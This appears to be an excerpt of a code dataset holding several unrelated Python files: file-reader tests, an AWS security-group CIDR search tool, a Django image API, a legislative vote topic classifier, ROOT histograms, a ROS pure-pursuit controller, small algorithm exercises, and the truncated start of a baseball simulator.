            self._file_reader.process_file('does_not_exist.txt')
        except SystemExit as err:
            self.assertEqual(str(err), '1')
        else:
            self.fail('No Exception raised.')
        self._assert_file_reader([], 1)
        self.assertLog(["ERROR: File does not exist: 'does_not_exist.txt'\n"])

    def test_process_file__is_dir(self):
        """Passing a directory logs a warning and processes nothing."""
        temp_dir = self.filesystem.join(self._temp_dir, 'test_dir')
        self.filesystem.maybe_make_directory(temp_dir)
        self._file_reader.process_file(temp_dir)
        # Because the log message below contains exception text, it is
        # possible that the text varies across platforms. For this reason,
        # we check only the portion of the log message that we control,
        # namely the text at the beginning.
        log_messages = self.logMessages()
        # We remove the message we are looking at to prevent the tearDown()
        # from raising an exception when it asserts that no log messages
        # remain.
        message = log_messages.pop()
        self.assertTrue(
            message.startswith(
                "WARNING: Could not read file. Skipping: '%s'\n  " % temp_dir))
        self._assert_file_reader([], 1)

    def test_process_file__should_not_process(self):
        """Files rejected by should_process() are counted but not processed."""
        file_path = self._create_file('should_not_process.txt', 'contents')
        self._file_reader.process_file(file_path)
        self._assert_file_reader([], 1)

    def test_process_file__multiple_lines(self):
        """Line splitting preserves '\\r' and a trailing empty line."""
        file_path = self._create_file('foo.txt', 'line one\r\nline two\n')
        self._file_reader.process_file(file_path)
        processed = [(['line one\r', 'line two', ''], file_path, None)]
        self._assert_file_reader(processed, 1)

    def test_process_file__file_stdin(self):
        """A file literally named '-' is still read from disk."""
        file_path = self._create_file('-', 'file contents')
        self._file_reader.process_file(file_path=file_path, test_kwarg='foo')
        processed = [(['file contents'], file_path, 'foo')]
        self._assert_file_reader(processed, 1)

    def test_process_file__with_kwarg(self):
        """Extra keyword arguments are forwarded to process()."""
        file_path = self._create_file('foo.txt', 'file contents')
        self._file_reader.process_file(file_path=file_path, test_kwarg='foo')
        processed = [(['file contents'], file_path, 'foo')]
        self._assert_file_reader(processed, 1)

    def test_process_paths(self):
        # We test a list of paths that contains both a file and a directory.
        dir = self.filesystem.join(self._temp_dir, 'foo_dir')
        self.filesystem.maybe_make_directory(dir)
        file_path1 = self._create_file('file1.txt', 'foo')
        rel_path = self.filesystem.join('foo_dir', 'file2.txt')
        file_path2 = self._create_file(rel_path, 'bar')
        self._file_reader.process_paths([dir, file_path1])
        processed = [(['bar'], file_path2, None), (['foo'], file_path1, None)]
        self._assert_file_reader(processed, 2)

    def test_count_delete_only_file(self):
        """Delete-only files increment their own counter, not file_count."""
        self._file_reader.count_delete_only_file()
        delete_only_file_count = self._file_reader.delete_only_file_count
        self.assertEqual(delete_only_file_count, 1)
|
15,748 | b730035e740aa806145c3f0849f345f17ac5d983 | #!/usr/bin/env python
import boto3
import argparse
from ipaddress import IPv4Network
import json
def prepare_arguments():
    """Build the command-line parser and return the parsed arguments."""
    arg_parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description="AWS VPC Security Groups Search Utility"
                    "\n\nAuthor: Tony P. Hadimulyono (github.com/tonyprawiro)")
    arg_parser.add_argument(
        '--profile', type=str, nargs='?', default="default", metavar="profile-name",
        help="AWS credential profile to select, default is 'default'. Check your ~/.aws/credentials file.")
    arg_parser.add_argument(
        '--search', type=str, nargs='?', default='0.0.0.0/0', metavar="search-term",
        help="Search term e.g. 10.20.30.40/32, default is 0.0.0.0/0 which will match any CIDR.")
    arg_parser.add_argument(
        '--egress', type=str, nargs='?', default='No', metavar="Yes",
        help="Search egress rules too, if omitted then egress is not searched")
    arg_parser.add_argument(
        '--regions', type=str, nargs='*', default=['all'], metavar="region_name",
        help="Region(s) to search for. Default is all regions.")
    return arg_parser.parse_args()
def get_all_regions(profile_name):
    """Return the name of every EC2 region visible to *profile_name*."""
    # Any region can serve the describe_regions call; us-east-1 always exists.
    session = boto3.session.Session(region_name='us-east-1', profile_name=profile_name)
    ec2 = session.client('ec2')
    response = ec2.describe_regions()
    return [region["RegionName"] for region in response["Regions"]]
def evaluate_network(subnetwork, network):
    """Return True if the two CIDR blocks overlap.

    '0.0.0.0/0' on either side short-circuits to True, matching the
    utility's "match anything" default.

    Bug fix: the original called the Python-2-only builtin ``unicode``,
    which raises NameError under Python 3.  IPv4Network requires text, so
    legacy byte strings are decoded as UTF-8 and native str is passed
    through, making the function work on both interpreters.
    """
    if subnetwork == '0.0.0.0/0' or network == '0.0.0.0/0':
        return True

    def _text(cidr):
        # Decode only byte strings (Python 2 str); text passes straight through.
        return cidr.decode('utf-8') if isinstance(cidr, bytes) else cidr

    return IPv4Network(_text(subnetwork)).overlaps(IPv4Network(_text(network)))
def main():
    """Scan the requested regions' security groups and print, as JSON, every
    group whose ingress (and optionally egress) CIDR rules overlap the
    search term.  Python 2 only (uses the print statement).
    """
    args = prepare_arguments()
    regions = args.regions
    if regions == ["all"]:
        regions = get_all_regions(args.profile)
    # result[region][group_id] = {"GroupName": ..., "Ingress": [...], "Egress": [...]}
    result = dict()
    for region in regions:
        session = boto3.session.Session(region_name=region, profile_name=args.profile)
        ec2 = session.client('ec2')
        # NOTE(review): describe_security_groups is paginated; groups beyond
        # the first page are silently missed — confirm whether that matters.
        response = ec2.describe_security_groups()
        # Get the security groups
        security_groups = []
        try:
            security_groups = response["SecurityGroups"]
        except:
            pass
        # Iterate the security groups
        for security_group in security_groups:
            ip_permissions = security_group["IpPermissions"]
            for ip_permission in ip_permissions:
                ip_ranges = ip_permission["IpRanges"]
                for ip_range in ip_ranges:
                    cidr_ip = ip_range["CidrIp"]
                    if cidr_ip != 'None':
                        is_overlapping = evaluate_network(args.search, cidr_ip)
                        if is_overlapping:
                            if not region in result:
                                result[region] = dict()
                            if not security_group["GroupId"] in result[region]:
                                result[region][security_group["GroupId"]] = dict()
                            result[region][security_group["GroupId"]]["GroupName"] = security_group["GroupName"]
                            if not "Ingress" in result[region][security_group["GroupId"]]:
                                result[region][security_group["GroupId"]]["Ingress"] = []
                            if cidr_ip not in result[region][security_group["GroupId"]]["Ingress"]:
                                result[region][security_group["GroupId"]]["Ingress"].append(cidr_ip)
            # Egress rules are only inspected when explicitly requested.
            if args.egress != 'No':
                ip_permissions_egress = security_group["IpPermissionsEgress"]
                for ip_permission_egress in ip_permissions_egress:
                    ip_ranges = ip_permission_egress["IpRanges"]
                    for ip_range in ip_ranges:
                        cidr_ip = ip_range["CidrIp"]
                        if cidr_ip != 'None':
                            is_overlapping = evaluate_network(args.search, cidr_ip)
                            if is_overlapping:
                                if not region in result:
                                    result[region] = dict()
                                if not security_group["GroupId"] in result[region]:
                                    result[region][security_group["GroupId"]] = dict()
                                result[region][security_group["GroupId"]]["GroupName"] = security_group["GroupName"]
                                if not "Egress" in result[region][security_group["GroupId"]]:
                                    result[region][security_group["GroupId"]]["Egress"] = []
                                if cidr_ip not in result[region][security_group["GroupId"]]["Egress"]:
                                    result[region][security_group["GroupId"]]["Egress"].append(cidr_ip)
        del session
    print json.dumps(result,
        sort_keys=True,
        indent=2)
# Script entry point.
if __name__ == "__main__":
    main()
|
15,749 | 17a845484f15e3ea91bc54fcfaaa360a87e1aea7 | from django.shortcuts import render
from rest_framework.parsers import MultiPartParser, FormParser,FileUploadParser
from rest_framework import viewsets, generics
from rest_framework.response import Response
from rest_framework import status
from orders.p_models.image_model import KImage
from orders.p_serializers.image_serializer import ImageSerializer
class ImageViewSet(viewsets.ModelViewSet):
    """CRUD API for KImage objects; accepts multipart/form-data uploads."""

    queryset = KImage.objects.all()
    serializer_class = ImageSerializer
    # Set parsers here if not set in settings.
    parser_classes = (FormParser, MultiPartParser, FileUploadParser)

    def create(self, request, *args, **kwargs):
        """Save one KImage per uploaded file and respond with all created ids.

        Bug fix: the original returned from inside the loop, so at most the
        FIRST uploaded file was ever saved.  Every file is now processed;
        the first invalid file still aborts with HTTP 400 (as before), and
        an upload with no files now yields an empty id list instead of the
        original's implicit ``return None`` (a server error in DRF).
        """
        images_arr = []
        for image in request.FILES:
            image_serializer = ImageSerializer(
                data={'description': request.data.get('description'),
                      'image': request.FILES[image]})
            if not image_serializer.is_valid():
                return Response(image_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
            image_serializer.save()
            images_arr.append(image_serializer.instance.id)
        return Response({'image_ids': images_arr}, status=status.HTTP_201_CREATED)

    def update(self, request, *args, **kwargs):
        """Partially update the instance, folding uploaded files into the payload."""
        if request.FILES:
            request.data['images'] = request.FILES
        serializer = self.get_serializer(self.get_object(), data=request.data, partial=True)
        serializer.is_valid(raise_exception=True)
        self.perform_update(serializer)
        return Response(serializer.data)

    def destroy(self, request, *args, **kwargs):
        """Delete the instance after detaching and deleting its related images."""
        instance = self.get_object()
        self.perform_destroy(instance)
        instance.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)

    def perform_destroy(self, instance):
        # Overrides DRF's default (which would delete `instance` itself):
        # here it only detaches each related image and deletes that image;
        # destroy() deletes the instance afterwards.
        # NOTE(review): mutating the relation while iterating its queryset
        # can skip rows — consider iterating over list(instance.images.all()).
        for e in instance.images.all():
            instance.images.remove(e)
            KImage.objects.get(id=e.id).delete()
|
15,750 | 09c6261b6d4b3e90add5c4dd9a1a3ec60ce5ebac | from ccu_utilities import *
from ccu_gen_beta.models import *
import pyUtilities as pyU
from prediction3 import classify
def genericAmendText(text):
    """Return True when *text* contains one of the boilerplate amendment
    phrases that carries no topical information (case-insensitive)."""
    lowered = text.lower()
    boilerplate = ('nature', 'not available', 'instructions', 'clarify standing')
    return any(phrase in lowered for phrase in boilerplate)
def findJonesSubTopicVotesUnique(vote):
    """Print candidate Jones subtopics for *vote* using the unique-words
    scorer: amendment votes are classified from the amendment text, other
    votes from the bill summary.  Python 2 / Django only; prints results
    rather than persisting them.

    NOTE(review): near-duplicate of findJonesSubTopicVotes below, differing
    only in the scoring function called — a shared helper would remove the
    duplication.
    """
    print vote
    if vote.amendment:
        #use text of amendment to find subtopics....
        amendmentText = None
        if not genericAmendText(vote.amendment.purpose):
            amendmentText = vote.amendment.purpose
        else:
            # Boilerplate purpose text carries no topical signal; give up.
            return
        if not genericAmendText(vote.amendment.description) and amendmentText != vote.amendment.description:
            amendmentText = amendmentText + ' ' + vote.amendment.description
        if vote.amendment.text and not genericAmendText(vote.amendment.text):
            amendmentText = amendmentText + ' ' + vote.amendment.text
        if not amendmentText:
            return
        # Everything after "as follows" is the literal amendment wording.
        amendmentText = amendmentText.split('as follows')[0]
        #get all topics of bill to kind of narrow things down a bit....
        subjects = vote.bill.subjects.all()
        topics = []
        for subject in subjects:
            for subtopic in subject.subtopics.all():
                if subtopic.topic not in topics:
                    #print subtopic
                    topics.append(subtopic.topic)
        if topics == []: return
        subtopicsD = findJonesSubTopicPresUniqueWords(amendmentText,topics,score=0.14)
        print subtopicsD
    elif vote.bill.summary.strip() != "": #if aboutBillOrRes(vote.voteType.voteType)s:
        #print 'HERE'
        vote.subtopics = []
        #just assign all subtopics of the bill to the vote...
        lsSubtopics = []
        topics = []
        for subject in vote.bill.subjects.all():
            #print 'SUBJECT %s' % subject
            for subtopic in subject.subtopics.all():
                #print ' SUBTOPIC %s w/ topic %s' % (subtopic.name,subtopic.topic.name)
                if subtopic not in lsSubtopics:
                    lsSubtopics.append(subtopic)
                if subtopic.topic not in topics:
                    topics.append(subtopic.topic)
        #print vote.bill.summary
        #print topics
        subtopicsD = findJonesSubTopicPresUniqueWords(vote.bill.summary,topics,score=0.14)
        #print subtopicsD
        sameAsLast=True
        print subtopicsD
def findJonesSubTopicVotes(vote):
    """Print candidate Jones subtopics for *vote* using the standard
    presence scorer.  Python 2 / Django only; prints results rather than
    persisting them.

    NOTE(review): near-duplicate of findJonesSubTopicVotesUnique above,
    differing only in the scoring function called.
    """
    print vote
    if vote.amendment:
        #use text of amendment to find subtopics....
        amendmentText = None
        if not genericAmendText(vote.amendment.purpose):
            amendmentText = vote.amendment.purpose
        else:
            # Boilerplate purpose text carries no topical signal; give up.
            return
        if not genericAmendText(vote.amendment.description) and amendmentText != vote.amendment.description:
            amendmentText = amendmentText + ' ' + vote.amendment.description
        if vote.amendment.text and not genericAmendText(vote.amendment.text):
            amendmentText = amendmentText + ' ' + vote.amendment.text
        if not amendmentText:
            return
        amendmentText = amendmentText.split('as follows')[0]
        #get all topics of bill to kind of narrow things down a bit....
        subjects = vote.bill.subjects.all()
        topics = []
        for subject in subjects:
            for subtopic in subject.subtopics.all():
                if subtopic.topic not in topics:
                    #print subtopic
                    topics.append(subtopic.topic)
        if topics == []: return
        subtopicsD = findJonesSubTopicPres(amendmentText,topics,score=0.14)
        print subtopicsD
    elif vote.bill.summary.strip() != "": #if aboutBillOrRes(vote.voteType.voteType)s:
        #print 'HERE'
        vote.subtopics = []
        #just assign all subtopics of the bill to the vote...
        lsSubtopics = []
        topics = []
        for subject in vote.bill.subjects.all():
            #print 'SUBJECT %s' % subject
            for subtopic in subject.subtopics.all():
                #print ' SUBTOPIC %s w/ topic %s' % (subtopic.name,subtopic.topic.name)
                if subtopic not in lsSubtopics:
                    lsSubtopics.append(subtopic)
                if subtopic.topic not in topics:
                    topics.append(subtopic.topic)
        #print vote.bill.summary
        #print topics
        subtopicsD = findJonesSubTopicPres(vote.bill.summary,topics,score=0.14)
        #print subtopicsD
        sameAsLast=True
        print subtopicsD
def cleanText(text):
    """Normalize legislative text for classification: lowercase, truncate at
    "as follows", strip honorifics, parentheticals, digits, representative
    surnames, state names, a long list of procedural word stems,
    punctuation and stop words.

    NOTE(review): ``import string`` is unused; the 'mr.'/'ms.'/'mrs.'
    regexes use an unescaped '.' (matches any character) — confirm intended.
    """
    import string
    # Procedural/boilerplate word stems removed before classification;
    # each stem also removes any suffix via the '\w*' in the regex below.
    words= ['strike','year','resolut','legis','table','bill','pass','amend','title','subtitle','specif','author','prohibit','juris','respons','submit','enhance','include','publish','requir','set']
    words.extend(['add','continue','event','purpose','remov','establ','instruct','develop','designate','direct','provide','senate'])
    words.extend(['congress','report','plan','exclude','confirm','forth','includ','consider','secretar','report','implemen'])
    words.extend(['h.r.','section','sub','date','act','regard','earli','early','use','certain','west','east','north','south','clarify','propos','nation'])
    words.extend(['introduc','approp','admin','process','affect','promote','program','prescribe','assist','reduce','facilit','communit','committee','project'])
    words.extend(['revis','improv','increase','likel','carry','assoc','agree','control','develop','service','approv','program','participate','make','recommend','change','integra'])
    #words.extend(['incr','limit','def','revis','alloc','program','leverag','provid','encourag','meet','federal','nation'])
    words.extend(['primar'])
    text = text.lower()
    # Everything after "as follows" is the literal amendment wording.
    text = text.split('as follows')[0]
    reTitle1 = re.compile('mr.\s*\S*,',re.I)
    reTitle2 = re.compile('ms.\s*\S*,',re.I)
    reTitle3 = re.compile('mrs.\s*\S*,',re.I)
    reParen = re.compile("\(.*?\)")
    reNum = re.compile('\d+')
    text = re.sub(reTitle1,' ',text)
    text = re.sub(reTitle2,' ',text)
    text = re.sub(reTitle3,' ',text)
    text = re.sub(reParen,'' ,text)
    text = re.sub(reNum,'',text)
    text = text.replace('mr.','').replace('ms.','').replace('mrs.','')
    # Remove representative surnames so names don't bias the classifier.
    for rep in Rep.objects.all():
        text = text.replace(rep.lastName.lower(),'')
    for word in words:
        reWord = re.compile('\s+' + word + '\w*\s*')
        text = re.sub(reWord,' ',text)
    for stateName in stateAbbrevs.values():
        reWord = re.compile(stateName + '\w*\s*',re.I)
        text = re.sub(reWord,'',text)
    #print 'after statenames'
    #print text
    text = pyU.removePunctuation(text)
    text = pyU.sStripStopWordsAll(text)
    #print 'after punc and strip words'
    #print text
    return text
#ADD SOMETHING WHEN BILL OR AMENDMENT HAS ALREADY BEEN PROCESSED...
def findJonesSubTopicVotesSVM(vote):
    """Classify and PERSIST subtopics for *vote* using the SVM classifier
    (prediction3.classify): amendment votes from the cleaned amendment
    text, bill votes sentence-by-sentence from the (truncated) summary.
    Skips anything already flagged subtopicsAssigned.  Python 2 / Django.
    """
    print ""
    print ""
    print "------------------------------------------"
    print vote
    #if vote.amendment:
    #vote.amendment.subtopicsAssigned=False
    #if vote.bill:
    #vote.bill.subtopicsAssigned=False
    if vote.amendment and not vote.amendment.subtopicsAssigned:
        #return
        #use text of amendment to find subtopics....
        amendmentText = None
        if not genericAmendText(vote.amendment.purpose):
            amendmentText = vote.amendment.purpose
        else:
            print 'generic amendment'
            print vote.amendment.purpose
            return
        if not genericAmendText(vote.amendment.description) and amendmentText != vote.amendment.description:
            amendmentText = amendmentText + ' ' + vote.amendment.description
        if vote.amendment.text and not genericAmendText(vote.amendment.text):
            amendmentText = amendmentText + ' ' + vote.amendment.text
        if not amendmentText:
            print 'no amendment text'
            return
        print 'AMENDMENT'
        print amendmentText
        amendmentText = cleanText(amendmentText)
        print "---------------"
        print amendmentText
        subtopics = classify(amendmentText)
        #print subtopics
        vote.amendment.subtopics = subtopics
        vote.amendment.subtopicsAssigned=True
        vote.amendment.save()
        print vote.amendment.subtopics.all()
    elif vote.bill.summary.strip() != "" and not vote.bill.subtopicsAssigned: #if aboutBillOrRes(vote.voteType.voteType)s:
        # NOTE(review): `topics` is collected here but never used on this
        # branch — classify() takes only the sentence text.
        subjects = vote.bill.subjects.all()
        topics = []
        for subject in subjects:
            for subtopic in subject.subtopics.all():
                if subtopic.topic not in topics:
                    #print subtopic
                    topics.append(subtopic.topic)
        print 'BILL'
        summary = vote.bill.summary
        # Cap very long summaries to keep classification tractable.
        if len(summary) > 5000:
            summary = summary[0:5000]
        print summary
        print "----------------------"
        #print len(vote.bill.summary)
        subtopics = []
        for sentence in pyU.lsSplitIntoSentences(summary):
            print sentence
            sentence = cleanText(sentence)
            print sentence
            subtopicsNew = classify(sentence)
            subtopics.extend(subtopicsNew)
            print subtopicsNew
        #print subtopics
        vote.bill.subtopics = subtopics
        vote.bill.subtopicsAssigned=True
        vote.bill.save()
        print vote.bill.subtopics.all()
    elif (vote.bill and vote.bill.subtopicsAssigned) or (vote.amendment and vote.amendment.subtopicsAssigned):
        print 'ALREADY ASSIGNED'
    else:
        print 'NO AMENDMENT AND NO BILL PURPOSE'
def getSenatorsCongressSubtopic(congress,subtopicID):
    """Return a '*'-delimited "repID:lastName" string of senators in the
    given congress who have at least one anomalous vote on the given Jones
    subtopic code.  Python 2 / Django.
    """
    strSenators=""
    lsTrack=[]  # repIDs already emitted, to avoid duplicates
    for rep in Rep.objects.filter(senator=True,congress__number=congress).order_by('lastName'):
        obj1 = None
        obj2 = None
        obj3 = None
        obj4 = None
        #print rep.party
        # Democrats are matched against demVoters, everyone else repVoters;
        # bill-level and amendment-level subtopics are queried separately.
        if rep.party.lower().find('d') > -1:
            obj1 = AnomVoters.objects.filter(vote__bill__congress=congress,demVoters__rep=rep,vote__bill__subtopics__code=subtopicID)
            obj2 = AnomVoters.objects.filter(vote__bill__congress=congress,demVoters__rep=rep,vote__amendment__subtopics__code=subtopicID)
        else:
            obj3 = AnomVoters.objects.filter(vote__bill__congress=congress,repVoters__rep=rep,vote__bill__subtopics__code=subtopicID)
            obj4 = AnomVoters.objects.filter(vote__bill__congress=congress,repVoters__rep=rep,vote__amendment__subtopics__code=subtopicID)
        print rep
        print obj1
        if obj1 != None:
            print 'HERE'
        print obj2
        print obj3
        print obj4
        print ""
        # NOTE(review): an empty Django queryset is falsy, so
        # `obj1 and obj1.count() == 0` can never be True when obj1 is empty —
        # this skip condition looks like it never fires; confirm intent.
        if (obj1 and obj1.count() == 0 and obj2.count() == 0) or (obj3 and obj3.count() == 0 and obj4.count() == 0):
            continue
        if rep.repID not in lsTrack:
            strSenators = strSenators + ("%s:%s*" % (rep.repID,rep.lastName))
            lsTrack.append(rep.repID)
    return strSenators
# Ad-hoc driver; the commented-out snippets below are earlier experiments
# kept by the original author.
if __name__ == '__main__':
    print getSenatorsCongressSubtopic(112,1911)
    # from JulianTime import convertDateTimeJul
    # congress112 = Congress.objects.filter(number=112)[0]
    # dtObj1 = congress112.beginDate
    # dtObj1 = datetime.datetime(dtObj1.year,dtObj1.month,dtObj1.day)
    # dtObj2 = congress112.endDate
    # dtObj2 = datetime.datetime(dtObj2.year,dtObj2.month,dtObj2.day)
    # print convertDateTimeJul(dtObj1)
    # print convertDateTimeJul(dtObj2)
    # assert 0
    #
    #print NAICSIndustryReport.objects.filter(vote=Vote.objects.get(number=288,bill__number=3082))
    #pass
    #for vote in Vote.objects.filter(bill__congress__number=112):
    #findJonesSubTopicVotesSVM(vote)
    #for vote in Vote.objects.filter(bill__congress__number=111):
    #findJonesSubTopicVotesSVM(vote)
|
15,751 | 2a20c9bbb791f4cd9732d1bdaad7335c00e79f26 | n = int(input())
MOD = 10 ** 9 + 7


def count_sequences(total):
    """Count sequences of dice rolls (faces 1-6) summing to *total*, mod 1e9+7.

    dp[i] is the number of sequences summing to i; dp[0] = 1 counts the
    empty sequence.  Extracted from the original stdin-reading script so it
    is importable and testable; the original also applied the modulus to
    each addend rather than the accumulated sum (correct only because the
    final print re-reduced it) — here every dp entry is kept reduced.
    """
    dp = [0] * (total + 1)
    dp[0] = 1
    for i in range(1, total + 1):
        # The last roll is x, so the prefix must sum to i - x.
        dp[i] = sum(dp[i - x] for x in range(1, 7) if i - x >= 0) % MOD
    return dp[total]


if __name__ == "__main__":
    print(count_sequences(int(input())))
|
15,752 | 20cdff59584739f4bd42b3f0dafbb262a20a1f0d | import ROOT
def declareHistos():
    """Book and return the RECO-level jet histograms, keyed by name."""
    print('Declaring histograms')
    histos = {}

    # (constructor, name, title, nbins, xlow, xhigh, x-axis label)
    specs = (
        (ROOT.TH1D, 'nJets_hist', 'Number of Jets (RECO)', 20, 0, 20, 'Number of Jets'),
        (ROOT.TH1F, 'leadingJetPt_hist', 'Leading Jet p_{T} (RECO)', 50, 0, 500, 'p_{T} (GeV)'),
        (ROOT.TH1F, 'trailingJetPt_hist', 'Trailing Jet p_{T} (RECO)', 50, 0, 500, 'p_{T} (GeV)'),
    )
    for ctor, name, title, nbins, xlow, xhigh, xlabel in specs:
        hist = ctor(name, title, nbins, xlow, xhigh)
        hist.GetXaxis().SetTitle(xlabel)
        hist.GetYaxis().SetTitle('Number of Events')
        histos[name] = hist

    print('Histograms declared')
    return histos
|
15,753 | de7d520162b7ac6d9dd4030dc29bef414c4f6c52 | #!/usr/bin/env python
import rospy
import sys
import os
from ackermann_msgs.msg import AckermannDriveStamped
from std_msgs.msg import Float32MultiArray, MultiArrayDimension, MultiArrayLayout
import numpy as np
import math
# TODO: import ROS msg types and libraries
# Lookahead distance (metres) for the pure-pursuit goal search.
LOOKAHEAD = 1.2
# NOTE(review): machine-specific path, unused by the code below — confirm
# before relying on it.
Waypoint_CSV_File_Path = '/home/zach/catkin_ws/src/lab6/waypoints/levine-waypoints.csv'
# Resolved at import time, so a ROS master must already be running.
Odom_Topic = rospy.get_param("/pose_topic")
# Wheelbase (metres) used in the steering-angle calculation.
Car_Length = 0.32
class PurePursuit(object):
    """Pure-pursuit steering controller.

    Subscribes to pre-transformed waypoints on /pure_pursuit and publishes
    AckermannDriveStamped commands on the drive topic.
    """

    def __init__(self):
        global Waypoint_CSV_File_Path
        global LOOKAHEAD
        global Car_Length
        self.L = LOOKAHEAD            # lookahead distance (m)
        self.car_length = Car_Length  # wheelbase (m)
        np.set_printoptions(threshold=sys.maxsize)
        self.iter = 0                 # callback counter, printed for debugging
        rospy.Subscriber("/pure_pursuit", Float32MultiArray, self.pose_callback, queue_size=1)
        self.drive_pub = rospy.Publisher('drive', AckermannDriveStamped, queue_size=1)

    def FindNavIndex(self, distances, L):
        """Return the index where the waypoint distance crosses the lookahead L,
        scanning forward (with wraparound) from the closest waypoint."""
        min_index = np.argmin(distances)
        differences = np.subtract(distances, L)
        next_differences = np.roll(differences, -1)
        i = min_index
        while 1:
            if i > (len(differences) - 1):
                i = 0  # wrap around to the start of the lap
            if np.sign(differences[i]) != np.sign(next_differences[i]):
                return i
            else:
                i += 1

    def FindNavPoint(self, goal_index, magnitudes, waypoints, L):
        """Interpolate between waypoint goal_index and its successor to the
        point whose distance from the car is exactly L."""
        if goal_index == len(waypoints) - 1:
            next_index = 0
        else:
            next_index = goal_index + 1
        mi = 0
        m1 = magnitudes[goal_index] - L
        m2 = magnitudes[next_index] - L
        x1 = waypoints[goal_index][0]
        x2 = waypoints[next_index][0]
        y1 = waypoints[goal_index][1]
        y2 = waypoints[next_index][1]
        # Find where the distance-minus-L curve crosses zero along the segment.
        xi = np.interp(mi, [m1, m2], [x1, x2])
        yi = np.interp(mi, [m1, m2], [y1, y2])
        goal_point = np.asarray([xi, yi])
        return goal_point

    def pose_callback(self, wp_msg):
        """Compute and publish a steering command from the latest waypoint
        message (rows: waypoints; last row: car pose; [0,0]: yaw)."""
        print(self.iter)
        self.iter += 1
        height = wp_msg.layout.dim[0].size
        width = wp_msg.layout.dim[1].size
        data = np.asarray(wp_msg.data)
        self.Waypoints_Master = np.reshape(data, (height, width))
        L = self.L
        car_length = self.car_length
        waypoints = self.Waypoints_Master[0:, 1:]
        car_point = self.Waypoints_Master[-1, 1:]
        angle_z = self.Waypoints_Master[0, 0]
        magnitudes = np.asarray([np.linalg.norm(waypoint - car_point) for waypoint in waypoints])
        # BUG FIX: the original called self.FindGoalIndex / self.FindGoalPoint,
        # which do not exist on this class (AttributeError on every callback);
        # the methods are named FindNavIndex / FindNavPoint.
        goal_index = self.FindNavIndex(magnitudes, L)
        goal_point = self.FindNavPoint(goal_index, magnitudes, waypoints, L)
        # Rotate the goal point into the car's frame.
        x = (goal_point[0] - car_point[0]) * math.cos(angle_z) + (goal_point[1] - car_point[1]) * math.sin(angle_z)
        y = -(goal_point[0] - car_point[0]) * math.sin(angle_z) + (goal_point[1] - car_point[1]) * math.cos(angle_z)
        goal_for_car = np.asarray([x, y])
        d = np.linalg.norm(goal_for_car)
        if goal_for_car[1] == 0:
            # Goal dead ahead: infinite turn radius, steer straight
            # (the original divided by zero here).
            steering_angle = 0.0
        else:
            turn_radius = (d ** 2) / (2 * (goal_for_car[1]))
            steering_angle = math.atan(car_length / turn_radius)
        # Clamp to the platform's +/- 0.4189 rad steering limit.
        if steering_angle > 0.4189:
            steering_angle = 0.4189
        elif steering_angle < -0.4189:
            steering_angle = -0.4189
        speed = 4.85
        self.ack = AckermannDriveStamped()
        self.ack.header.frame_id = 'steer'
        self.ack.drive.steering_angle = steering_angle
        self.ack.drive.speed = speed
        self.ack.header.stamp = rospy.Time.now()
        self.drive_pub.publish(self.ack)
def main():
    """Start the pure_pursuit ROS node and hand control to the ROS event loop."""
    rospy.init_node('pure_pursuit_node')
    tracker = PurePursuit()
    loop_rate = rospy.Rate(7)
    loop_rate.sleep()
    rospy.spin()


if __name__ == '__main__':
    main()
|
class Solution(object):
    def isPalindrome(self, s):
        """Return True if *s* is a palindrome, considering only
        alphanumeric characters and ignoring case.

        :type s: str
        :rtype: bool
        """
        # Keep only the alphanumeric characters, lower-cased.  The empty
        # string yields an empty list, which equals its own reverse, so
        # the original explicit `s == ""` special case was redundant.
        cleaned = [ch.lower() for ch in s if ch.isalnum()]
        return cleaned == cleaned[::-1]
15,755 | 1b00fc90fb2dd21a3d9cc147e2431eb69dc5f151 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Title: Simple Baseball Simulator
Created on Sat Mar 30 23:59:36 2019
@author: edwardmwadsworth
"""
from random import randint
import pandas as pd
# GLOBAL VARIABLES
# GSB stands for Game Status Board.
# Initialize GSB
Team=['VISITOR','HOME']
def InitializeGSB():
    """(Re)create the global Game Status Board (GSB) for a fresh game."""
    global GSB
    fresh_batter = dict(Strikes=0, Balls=0)
    GSB = dict(
        Inning=1,
        Score={Team[0]: 0, Team[1]: 0},
        Team_at_Bat=Team[0],
        Bat_Team_Status=dict(Outs=0,
                             Bases=[0, 0, 0],  # 1st, 2nd, 3rd
                             Batter_Up=fresh_batter),
    )
# PROGRAM FUNCTIONS
def Game_Over():
    """Return True when the game should stop, judging from the global GSB.

    Regulation play is 9 innings; a tie extends the game until one team
    leads (see the "overtime option" below).
    """
    Game_Over = True  # NOTE(review): local variable shadows the function name; works, but confusing
    if GSB['Inning']<9:
        Game_Over = False
    # If we're in the bottom of 9th, and the first team is trailing, the game is over
    if GSB['Inning']==9:
        # The visitor always completes its half of the 9th.
        if GSB['Team_at_Bat']==Team[0]:
            Game_Over = False
        # The home half continues while the visitor leads and outs remain.
        if GSB['Bat_Team_Status']['Outs'] < 3 and GSB['Score'][Team[0]] > GSB['Score'][Team[1]]:
            Game_Over = False
        # tie game at bottom of ninth:
        if GSB['Score'][Team[0]] == GSB['Score'][Team[1]]:
            Game_Over = False
    # overtime option, continue until one team scores
    if GSB['Inning'] > 9 and GSB['Score'][Team[0]] == GSB['Score'][Team[1]]:
        Game_Over = False
    return Game_Over
def Team_Up():
    """Switch the team at bat and reset the half-inning state.

    The inning counter advances only when play passes back to the
    visitor, i.e. after the home team's half of the inning.
    """
    GSB['Bat_Team_Status'] = dict(Outs = 0,
                                  Bases = [0,0,0], # 1st, 2nd, 3rd
                                  Batter_Up = dict(Strikes=0, Balls=0)) # Always re-initialize batting team round stats
    if GSB['Team_at_Bat'] == Team[0]: # If VISITOR was at bat at top
        GSB['Team_at_Bat'] = Team[1] # HOME goes to bat at bottom of inning
    else:
        GSB['Team_at_Bat'] = Team[0] # else put VISITOR back at bat...
        GSB['Inning'] += 1 # ...and advance to the next inning
def Batter_Up():
    """Bring up the next batter, or hand the half-inning over after 3 outs."""
    if GSB['Bat_Team_Status']['Outs'] >= 3:
        Team_Up()
    else:
        GSB['Bat_Team_Status']['Batter_Up'] = dict(Strikes=0, Balls=0)
# NOW, HERE ARE THE 11 "PITCH FUNCTIONS":
def Double():
    """Batter reaches second; every runner advances two bases.

    Implemented by pushing [0, 1] onto the front of the base list; the
    two popped overflow slots are runners pushed past 3rd, i.e. runs.
    """
    GSB['Bat_Team_Status']['Bases'].insert(0,1)
